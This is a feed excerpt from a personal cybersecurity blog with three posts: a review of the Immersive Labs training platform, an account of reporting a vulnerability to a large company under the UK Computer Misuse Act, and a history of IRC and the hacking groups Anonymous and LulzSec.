<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Immersive Labs #1]]></title><description><![CDATA[This blog is about Immersive Labs, and how it's helping me establish a good cyber security foundation and beyond.]]></description><link>https://flaviu.io/immersive-labs/</link><guid isPermaLink="false">5f972e7f1679673a38c4b741</guid><category><![CDATA[learning]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 04 Nov 2020 21:40:05 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/11/IL.jpg" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/immersivelabs-1.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="999" height="333" srcset="https://flaviu.io/content/images/size/w600/2020/10/immersivelabs-1.png 600w, https://flaviu.io/content/images/2020/10/immersivelabs-1.png 999w" sizes="(min-width: 720px) 720px"><figcaption><strong>the world&#x2019;s first fully interactive, gamified and on-demand cyber skills platform.</strong></figcaption></figure><img src="https://flaviu.io/content/images/2020/11/IL.jpg" alt="Immersive Labs #1"><p>This blog is about <a href="https://immersivelabs.online/">Immersive Labs</a>, and how it&apos;s helping me establish a good cyber security foundation and beyond.</p><p><em>I hope you will find this information useful</em>.</p><hr><blockquote>This is not a sponsored article.</blockquote><p></p><p>Immersive Labs is changing the way companies address their cyber skills challenges.<br></p><p>It was founded by former GCHQ cybersecurity instructor James Hadley; the platform combines learning methods used by hackers with real-time threat intelligence to help your security team keep pace with attackers. 
They do this by creating story-driven virtual games in the browser, called labs.</p><p>A couple of differences between IL and other platforms:</p><p>Other platforms, e.g. <a href="https://hackthebox.eu">HackTheBox</a> or <a href="https://tryhackme.com/">TryHackMe</a>, might require you to have Linux on your host or in a virtual machine and to connect to their VPN; for IL, all you need is within your browser.</p><p>In each lab you will get an information tab with a quick summary of that specific subject and a few resources to help you complete the lab. This is something you don&apos;t find in HackTheBox, although TryHackMe do have labs with a few &apos;hints&apos; along the way.</p><p><br>Each lab allows users to learn from real-life scenarios ranging from cyber awareness to headline-hitting malware and everything in between.</p><p><br>These labs even include emerging threats and vulnerabilities the same day they&apos;re discovered.<br>Immersive Labs challenge users to find their own solutions, encouraging creative thinking and ultimately long-term skills development and talent retention.<br></p><p>For organizations, there is the option to keep track of your team&apos;s progress as they complete labs; IL use this information to benchmark the organization&apos;s cyber capabilities against industry frameworks, including MITRE ATT&amp;CK, so that teams always know where their strengths - and most importantly, their weaknesses - lie.</p><hr><p>Immersive Labs is free for students under the name &quot;<a href="https://dca.immersivelabs.online/signin">Students&#x2019; Digital Cyber Academy</a>&#x2122;<strong>&quot;. </strong>IL have mentioned that the labs on this platform are the same ones that <a href="https://www.goldmansachs.com/">Goldman Sachs</a>, <a href="https://www2.deloitte.com/global/en.html">Deloitte </a>and <a href="https://www.baesystems.com/en/home">BAE Systems</a> use to train their staff.</p><p>A couple of my lecturers had mentioned this platform when I 
started my studies at university, and ultimately this is how I joined. All you need to register is your student email, and you will have access to hundreds of labs, with more created every day.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/lights.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1920" height="1157" srcset="https://flaviu.io/content/images/size/w600/2020/10/lights.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/lights.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/lights.jpg 1600w, https://flaviu.io/content/images/2020/10/lights.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Juegos del Parque Rod&#xF3;</figcaption></figure><p>They are building content and simulations that challenge users at any level to rapidly and constantly upskill; anyone can start from scratch, gathering the basics through a series of labs to build a strong foundation of cyber security knowledge.</p><p>Users will work with a variety of operating systems and security tools, as well as learning how to analyze log files and code.</p><p>For example, gamified scenarios let users see the impact of their decisions in real time and better understand outcomes.</p><p><br>Story-based threat simulations let users sharpen their skills while stopping an online breach or hacking industrial control systems, with contained access to operating systems, tools and malicious code.</p><p>I believe that this is a good way to continuously develop cyber skills.<br>Every part of your workforce needs some level of cyber skills, and traditional teaching, e.g. classroom and online training, might not offer enough visibility of how effective the courses are, and can quickly become out of date. 
Also, training isn&apos;t always directly relevant to the real risks we face.</p><h3 id="competition">Competition</h3><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/competition.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1920" height="1221" srcset="https://flaviu.io/content/images/size/w600/2020/10/competition.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/competition.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/competition.jpg 1600w, https://flaviu.io/content/images/2020/10/competition.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Tough Competition</figcaption></figure><p>Immersive Labs have three types of ranking on their leaderboard system.</p><ul><li>My Organization</li><li>Global Ranking</li><li>League Table</li></ul><p>My Organization is made up of people who share the same email domain. What I mean by that: I enrolled under <em>my student e-mail</em>, so IL knows I belong to Caledonian University, and the ranking is you vs. all the users from the same domain.</p><p>Global Ranking is yourself vs. everyone registered on Immersive Labs.</p><p>League Table is your organization, in my case my university, vs. all the other universities that are registered.</p><p>Another good point to mention is that Immersive Labs structure the content you receive based on the persona you pick.</p><p>They currently have five different personas:</p><!--kg-card-begin: markdown--><p>Non-Technical - You don&apos;t work in cyber security, but you&apos;ve seen stories in the news about recent attacks and would like to understand more about staying secure.</p>
<p>Executive - You are a senior executive or board member. You want to understand cyber security topics and risk decisions in more detail.</p>
<p>Engineer - You work with computers and networks on a daily basis. You want to understand how to improve security when building and deploying new infrastructure.</p>
<p>Developer - You are responsible for developing and maintaining applications in your environment. You would like to acquire and demonstrate knowledge and skills to keep those applications secure.</p>
<p>Cyber-Professional - You currently work (or aspire to work) in a cyber security role and like to keep up with the latest threats. You enjoy learning about risk and solving technical problems in both a defensive and offensive environment.</p>
<!--kg-card-end: markdown--><p>You can switch between personas and solve different labs. The points you receive are tracked per persona and are not added together into one total.</p><hr><h3 id="what-is-the-outcome">What is the outcome?</h3><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/outcome.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1024" height="768" srcset="https://flaviu.io/content/images/size/w600/2020/10/outcome.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/outcome.jpg 1000w, https://flaviu.io/content/images/2020/10/outcome.jpg 1024w" sizes="(min-width: 720px) 720px"><figcaption>success</figcaption></figure><p>You become the driving force behind improving your organization&apos;s security posture. </p><p>You can learn the skills you need to help your organization stay secure and better understand cybersecurity threats, from detecting phishing to malware reverse-engineering.</p><h3 id="my-current-stats-">My current stats: </h3><!--kg-card-begin: markdown--><p>My main persona: Cyber Security Professional</p>
<p>Completed 233 labs</p>
<p>Completed Objectives:</p>
<ol>
<li>Become a Junior Penetration Tester</li>
<li>Become a Tier 1 SOC Analyst</li>
<li>Essential Cyber Security for Remote Workers 4 &#x2013; Attacks &amp; Vulnerabilities</li>
<li>Essential Cyber Security for Remote Workers 2 &#x2013; Cyber Security Awareness</li>
<li>Protect Yourself Online</li>
<li>Essential Cyber Security for Remote Workers 1 &#x2013; Intro to Cyber Security</li>
<li>Essential Cyber Security for Remote Workers 3 &#x2013; Terminology &amp; Technology</li>
<li>Introduction to Network Technologies</li>
<li>Introduction to Operating Systems</li>
<li>Introduction to Cyber Investigations</li>
</ol>
<!--kg-card-end: markdown--><h3 id="leaderboard">Leaderboard</h3><p></p><ul><li><strong>Organization</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1892" height="979" srcset="https://flaviu.io/content/images/size/w600/2020/11/image.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image.png 1600w, https://flaviu.io/content/images/2020/11/image.png 1892w" sizes="(min-width: 720px) 720px"><figcaption>proud #1 from my organization immersive labs (359 records)</figcaption></figure><ul><li><strong>Global Ranking</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-1.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1873" height="977" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-1.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-1.png 1600w, https://flaviu.io/content/images/2020/11/image-1.png 1873w" sizes="(min-width: 720px) 720px"><figcaption>proud #130 in global ranking (21,187 records)</figcaption></figure><ul><li><strong>League Table</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-2.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1871" height="952" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-2.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-2.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-2.png 1600w, https://flaviu.io/content/images/2020/11/image-2.png 1871w" sizes="(min-width: 720px) 720px"><figcaption>proud #13 in league table (939 
records)</figcaption></figure><p></p><!--kg-card-begin: html--><a href="https://flaviu.io/content/images/data/Activity-Report.pdf">View My Activity Report Here</a>
<!--kg-card-end: html--><!--kg-card-begin: markdown--><p>Have you got any suggestions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The Grey area of Hacking]]></title><description><![CDATA[Grey area of hacking, what happens when you find a vulnerability in a multi-billion pound company with no disclosure policy?  ]]></description><link>https://flaviu.io/the-grey-area-of-hacking/</link><guid isPermaLink="false">5f8e10be1679673a38c4b2b7</guid><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 26 Oct 2020 18:36:35 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/10/greyhat-3.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/white-gray.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="640" height="427" srcset="https://flaviu.io/content/images/size/w600/2020/10/white-gray.jpg 600w, https://flaviu.io/content/images/2020/10/white-gray.jpg 640w"><figcaption>White / Gray ?</figcaption></figure><hr><img src="https://flaviu.io/content/images/2020/10/greyhat-3.png" alt="The Grey area of Hacking"><p>In life there are debates that seem to go on forever, with never a definitive conclusion in sight. These debates, like many others, span centuries and give rise to what are known as &quot;age-old questions&quot;. One such question in ethical hacking is &quot;When does white become grey?&quot; Some say it is when your intentions change from ethical to unethical; others say it is when you do something you have not had permission for, no matter what your intentions are. 
Regardless of our individual opinions, there are laws, and those are what define the grey area. The most well-known relevant act in the UK is the <em>Computer Misuse Act 1990</em>, which brought in three offences:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/balance-law.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2020/10/balance-law.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/balance-law.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/balance-law.jpg 1600w, https://flaviu.io/content/images/2020/10/balance-law.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption><b>balance</b> and harmony.</figcaption></figure><ol><li>Unauthorized access to computer material.</li><li>Unauthorized access with intent to commit or facilitate the commission of further offences.</li><li>Unauthorized acts with intent to impair, or with recklessness as to impairing, operation of a computer, etc.</li></ol><p>This act has since been amended twice: by the <a href="http://www.legislation.gov.uk/ukpga/2006/48/contents">Police and Justice Act 2006</a>, which added section 3A, and by the <a href="http://www.legislation.gov.uk/ukpga/2015/9">Serious Crime Act 2015</a>, which added section 3ZA:</p><p>3ZA. Unauthorised acts causing, or creating a risk of, serious damage.</p><p>3A. 
Making, supplying or obtaining articles for use in an offence under section 1, 3 or 3ZA.</p><p>Each of these offences carries a different maximum prison sentence: offences under sections 1 and 3A carry up to 2 years&apos; imprisonment, section 2 up to 5 years, section 3 up to 10 years, and section 3ZA, the most serious offence in the act, up to 14 years, or life imprisonment where the act causes loss of life, serious injury or serious damage to national security.</p><hr><blockquote><em>Before we move on please see /<a href="https://flaviu.io/disclaimer/">disclaimer</a>/</em></blockquote><p>So here I am, sitting at my desk with this bug that I have just confirmed, knowing it could potentially be exploited by a black hat hacker to the point where the company&apos;s security is at risk, or even worse, where they end up being held for <a href="https://www.acronis.com/en-gb/articles/ransomware-attacks/">ransom, which is very common in 2020.</a></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/law-hammer.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1061" srcset="https://flaviu.io/content/images/size/w600/2020/10/law-hammer.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/law-hammer.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/law-hammer.jpg 1600w, https://flaviu.io/content/images/2020/10/law-hammer.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption><strong><em>The</em> <em>gavel!</em></strong></figcaption></figure><p>Looking at the above laws, my case would fall under offence 1), since I did not have permission for testing, and with no disclosure policy in place there was no sanctioned way for me to report this vulnerability to them.</p><p><br>So what do I do? 
Should I just ignore it and go on with the rest of my day?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/dad.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1372" srcset="https://flaviu.io/content/images/size/w600/2020/10/dad.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/dad.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/dad.jpg 1600w, https://flaviu.io/content/images/2020/10/dad.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Proud father of 2 toddlers</figcaption></figure><p>I think this is many researchers&apos; dilemma. Remember the case where two pentesters had written authorization to test a building&apos;s physical security and were later arrested on felony third-degree burglary charges (the charges have since been dropped).</p><p>Take another example: only a few weeks earlier I remember reading a post on LinkedIn where a company that specializes in mobile app pentesting had looked into an application and found a critical vulnerability where users&apos; data was at risk of being breached. 
The pentester contacted the owner of the application, but their report was ignored; the pentester then went public with their findings, which led the company to deny the allegations and started a dispute between the two parties.</p><p>You can find a couple more grey hat hacker examples <a href="https://www.thesslstore.com/blog/mysterious-russian-grey-hat-vigilante-patched-over-100000-routers/">here</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/dillemma-1.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1000" height="662" srcset="https://flaviu.io/content/images/size/w600/2020/10/dillemma-1.jpg 600w, https://flaviu.io/content/images/2020/10/dillemma-1.jpg 1000w" sizes="(min-width: 720px) 720px"><figcaption>dilemma</figcaption></figure><!--kg-card-begin: markdown--><p>I believe companies and the current legislation should enable researchers to safely undertake <mark>some analysis</mark> and so support businesses, especially those who cannot afford testing and are at huge risk of being hacked.</p>
<!--kg-card-end: markdown--><p>In the end, I decided to do what was best according to the values that I hold and disclose the information. I knew there was potential for the company in question to be rather annoyed, and they had every right to be according to the law. However, I knew my intentions were honourable and hoped that would stand me in good stead, and that they wouldn&apos;t be annoyed to the extent of reporting me; but you never know who is on the other side of the computer, and therefore how they will react.</p><!--kg-card-begin: markdown--><h6 id="inregardstothevulnerabilityifoundiamtalkingaboutabritishmultinationalengineeringanddefencebusinesswithanetworthofover16billionpounds">In regards to the vulnerability I found, I am talking about a British multinational engineering and defence business with a net worth of over 16 billion pounds.</h6>
<!--kg-card-end: markdown--><hr><p>This particular company did not have a vulnerability disclosure policy in place at the time of my findings. The person I approached to report my findings, the Cyber Incident Lead at the company in question, was very polite and professional.</p><p>They helped me by sharing the details of their SOC, where I could send my report; the e-mail address in question is not openly shared on the web.</p><p>I could only imagine how busy a person with such responsibility must be, so I left them to it, not thinking &quot;<em>what did I just start?&quot;</em></p><p>A couple of months went by and, of course, I received some updates along the way stating that the cyber department was still working on the matter. It soon came to light that my action had prompted the company to perform analysis on all their domains, which could number in the hundreds of thousands; at the same time they rolled out their vulnerability disclosure policy.</p><p>This was later confirmed when I received the following.</p><blockquote>&quot;We were already rolling out the vulnerability disclosure policy, but your engagement was nicely timed to validate the need for external parties having a viable and approved entry into the business.&quot;</blockquote><h3 id="conclusion">Conclusion</h3><hr><ul><li>The company has fixed the flaw I reported and has since checked all their assets for such vulnerabilities.</li><li>I have met some wonderful people and made connections within the IT industry. 
</li><li>The company has put their vulnerability disclosure policy in place, which is awesome: researchers now have a sanctioned route to report bugs they find within the scope of the program.</li><li>I became more careful when engaging in tests, especially regarding what policies and programs are in place.</li><li>This opportunity enabled me to look at the wider issue of the current legislation preventing the white hat/pentest community from undertaking some analysis.</li><li>The Head of Department at my university has been informed about my encounter with the company and is aware of the value I added.</li><li>I received an amazing book and cannot wait to read it.</li></ul><hr><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/10/sandworm-2.jpg" width="2000" height="2667" loading="lazy" alt="The Grey area of Hacking" srcset="https://flaviu.io/content/images/size/w600/2020/10/sandworm-2.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/sandworm-2.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/sandworm-2.jpg 1600w, https://flaviu.io/content/images/size/w2400/2020/10/sandworm-2.jpg 2400w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/10/sandworm2-4.png" width="1000" height="1326" loading="lazy" alt="The Grey area of Hacking" srcset="https://flaviu.io/content/images/size/w600/2020/10/sandworm2-4.png 600w, https://flaviu.io/content/images/2020/10/sandworm2-4.png 1000w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin&apos;s Most Dangerous Hackers</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Internet Relay Chat And Hackers]]></title><description><![CDATA[We Are Anonymous.
We Are Legion.
We do not forgive.
We do not forget.
Expect us.]]></description><link>https://flaviu.io/internet-relay-chat-and-hackers/</link><guid isPermaLink="false">5f6d9dba1679673a38c4aec8</guid><category><![CDATA[hacking]]></category><category><![CDATA[irc]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Sun, 27 Sep 2020 21:15:48 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/09/network.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/09/network.jpg" alt="Internet Relay Chat And Hackers"><p>In this article I will talk about IRC, a chat protocol and server software that has been around since the late 1980s. Ever since my adolescence I&apos;ve been on and around IRC; it&apos;s just something I&apos;ll never forget. Perhaps this is where my offensiveness comes from.</p><h3 id="-the-past-beats-inside-me-like-a-second-heart-">&#x201C;The past beats inside me like a second heart.&#x201D;<br></h3><h3 id="what-is-irc">What is IRC?</h3><hr><p><strong>IRC</strong> is an open protocol that runs over TCP and, optionally, TLS. An <strong>IRC server</strong> can connect to other <strong>IRC servers</strong> to expand the <strong>IRC</strong> network. Users access <strong>IRC</strong> networks by connecting a client to a <strong>server</strong>. There are many client implementations, such as mIRC, HexChat and irssi, and <strong>server</strong> implementations, e.g. 
the original IRCd.</p><p>An IRCd, short for Internet Relay Chat daemon, is server software that implements the IRC protocol, enabling people to talk to each other via the Internet.</p><h3 id="irc-clients">IRC CLIENTS</h3><hr><p>My go-to client on Windows would be mIRC; this client is only built for the Windows operating system, so it will not run natively on Linux.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-11.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="760" height="504" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-11.png 600w, https://flaviu.io/content/images/2020/09/image-11.png 760w" sizes="(min-width: 720px) 720px"><figcaption>mIRC client - Windows</figcaption></figure><p>But if you are on Linux you&apos;d want to pick between irssi or XChat; these clients also work on Windows, and of course there are more options to pick from. It&apos;s all about your preferences in terms of simplicity and graphics.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-10.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="885" height="576" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-10.png 600w, https://flaviu.io/content/images/2020/09/image-10.png 885w" sizes="(min-width: 720px) 720px"><figcaption>XChat - freenode server - Linux</figcaption></figure><h3 id="mirc-and-xchat-creators">mIRC and Xchat creators</h3><hr><p><strong>mIRC - Khaled Mardam-Bey</strong>, the developer of mIRC, started working on it in 1994 while studying for a Cognitive Science degree at the University of Westminster in London, where he first learned about the Internet.</p><p><strong>XChat</strong> is the project of one man, Peter &#x17D;elezn&#xFD;, also known as zed. 
<strong>XChat</strong> was initially developed as a Unix/Linux GTK application; however, <strong>XChat</strong> now works on Windows too, which came about because of high demand.</p><h3 id="connecting-to-irc-servers">Connecting to IRC servers</h3><hr><p>The largest IRC networks have traditionally been grouped as the &quot;Big Four&quot;.</p><p>The &quot;Big Four&quot; were:</p><ul><li>EFnet</li><li>IRCnet</li><li>UnderNet</li><li>DALnet</li></ul><p>Some statistics:</p><p>IRC reached 16 million users in 2001 and 10 million users in 2003.</p><p>Here are some of the largest IRC networks:</p><ul><li>freenode </li><li>IRCnet</li><li>EFnet</li><li>Undernet</li><li>QuakeNet</li><li>Rizon</li><li>OFTC</li><li>DALnet</li></ul><h3 id="latest-news-about-irc">Latest news about IRC</h3><p>Internet Relay Chat (IRC) has lost the bulk of its users since its 2003 peak, falling from 10 million to about 400,000 today. In 2003 there were 500,000 channels; now there is half that number. This is due in large part to the advent of the Web, social media platforms, and other software that is more interactive and can do a lot more than plain text can.</p><h3 id="irc-is-not-dead-the-interesting-part-">IRC IS NOT DEAD. [THE INTERESTING PART]</h3><hr><p>So if you wonder what happens over on IRC servers right now, you&apos;ll be able to find all kinds of servers, ranging from those for seeking help with your project (e.g. Freenode, previously known as Open Projects Network, an IRC network used to discuss peer-directed projects) to those where you can just hang out and talk to people (e.g. DALnet). 
Let&apos;s not forget IRC servers have been the home of many <strong>hackers</strong> for a very long time; you could find some old-school hackers on UnderNet, however many of those guys run private servers and hide from the world.</p><hr><blockquote>&#x201C;Scars have the strange power to remind us that our past is real.&#x201D;</blockquote><p><strong>1337 THE HACKER COLLECTIVE</strong></p><p>The birth of Anonymous itself was sporadic and amorphous. It emerged over several years; the beginning was around 2006 on the popular 4chan message board and in Internet Relay Chat channels. The first Anons were in it for the lulz&#x2013;simple amusement.</p><p>Anonymous and its factions LulzSec and AntiSec drew widespread attention between 2008 and 2012 as they tore loudly through the internet, ruthlessly hacking websites, exposing corporate secrets, raiding email spools, and joining the fight of the &quot;We are the <em><strong>99</strong></em>%&quot;. The groups appeared to be unstoppable as they attacked one target after another, more than 200 in all by the government&apos;s count. It seemed nobody was beyond their grasp.</p><p>Just as Anonymous gained mainstream notoriety, however, it seemed to disappear. Little was heard from the group again until 2010, when Anonymous defended the cause of file-sharers with DDoS attacks aimed at the Motion Picture Association of America and others. But the move that really got the group attention was Operation: Payback, a series of DDoS attacks against PayPal, Visa and MasterCard for their refusal to process donations to WikiLeaks after the site began publishing the leaks of <em>Chelsea Manning</em>. There was also Operation Last Resort, which targeted the U.S. Sentencing Commission and MIT websites to protest the unusually harsh prosecution of internet activist <em>Aaron Swartz</em>. Since then, Anonymous has gone silent for the most part.</p><p>When WikiLeaks drew attention to the DDoS attacks, interest in Anonymous grew exponentially. 
Participation on the public channel where members and spectators communicated jumped tenfold from 700 to 7,000 people.</p><p>I personally remember the AnonOps IRC server, which I believe still exists to this day. They were using Etherpad to keep the participants updated on the current Operations. Etherpad is a web application that allows for real-time group collaboration on text documents.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/anon.jpg" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2020/09/anon.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/anon.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/anon.jpg 1600w, https://flaviu.io/content/images/2020/09/anon.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Anonymous Hacking Group</figcaption></figure><p>The group was undone in part by Hector Xavier Monsegur, known online by the <em>nom de hack</em> <strong>Sabu</strong>.</p><p>Check <a href="https://en.wikipedia.org/wiki/Timeline_of_events_associated_with_Anonymous">this</a> if you are curious to see all the <strong>Ops</strong> that were carried out by the Anonymous hacking group.</p><hr><p><strong>LulzSec</strong>? Sure!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-13.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="300" height="340"><figcaption>LulzSec Hacking Group</figcaption></figure><p>Lulz Security, abbreviated as <strong><em>LulzSec</em></strong>, was a black-hat computer hacking group that claimed to be responsible for several high-profile attacks, including the compromise of user accounts from Sony Pictures in 2011. 
The group also claimed responsibility for taking the CIA website offline.</p><p>One of the founders of LulzSec, <strong>Hector Xavier Monsegur</strong>, was identified by Backtrace Security in 2011 in a PDF publication named &quot;Namshub&quot;.</p><p><strong>Sabu</strong> featured prominently in the group&apos;s published IRC chats. <em>The Economist</em> referred to Sabu as one of LulzSec&apos;s six core members and their &quot;most expert&quot; hacker.</p><p>He later helped law enforcement track down other members of the organization as part of a plea deal. At least four associates of LulzSec were arrested in March 2012 as part of this investigation. British authorities had previously announced the arrests of two teenagers they alleged were LulzSec members T-flow and Topiary.</p><p>At just after midnight on 26 June 2011, LulzSec released a &quot;50 days of lulz&quot; statement, which they claimed to be their final release, confirming that LulzSec consisted of six members and that their website was to be shut down. This breaking up of the group was unexpected.</p><p>Those who have followed the movement closely have said Sabu&apos;s participation in the arrest of Jeremy Hammond and others has had a chilling effect on Anonymous, causing members to lay low and worry whether additional informants are lurking among them.</p><p>Below are chatroom logs of discussions between the hackers involved in LulzSec.</p><pre><code class="language-ascii">. /$$                 /$$            /$$$$$$
.| $$                | $$           /$$__  $$
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!

   __
   )|     ________________________.------,_ _
 _/o|_____/  ,____________.__;__,__,__,__,_Y...:::---===````//    #anonymous
|==========\ ;  ;  ;  ;  ; \__,__\__,_____ --__,-.\   OFF  ((     #lulzsec
           `----------|__,__/__,__/__/  )=))~((   &apos;-\  THE  \\    #antisec
                        \ ==== \          \\~~\\     \  PIGS \\   
                        `| === |           ))~~\\     ```&quot;&quot;&quot;=,))  
                         | === |           |&apos;---&apos;)                
                        / ==== /           `=====&apos;
                        &#xB4;------&#xB4;</code></pre><ul><li><a href="https://flaviu.io/content/images/log/lulzsec.txt">Log.txt</a> - Tensions Inside The Group &apos;for the lulz&apos;</li></ul><h2 id="identity-sabu-">Identity [Sabu]</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-14.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="2000" height="1333" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-14.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-14.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-14.png 1600w, https://flaviu.io/content/images/size/w2400/2020/09/image-14.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><strong>Hector Xavier Monsegur aka Sabu</strong></figcaption></figure><p>At the time of his arrest Xavier was 28 years old, unemployed and facing a sentence of 124 years in prison.</p><p>Xavier served 7 months in prison after his arrest but had been free since then while awaiting sentencing. 
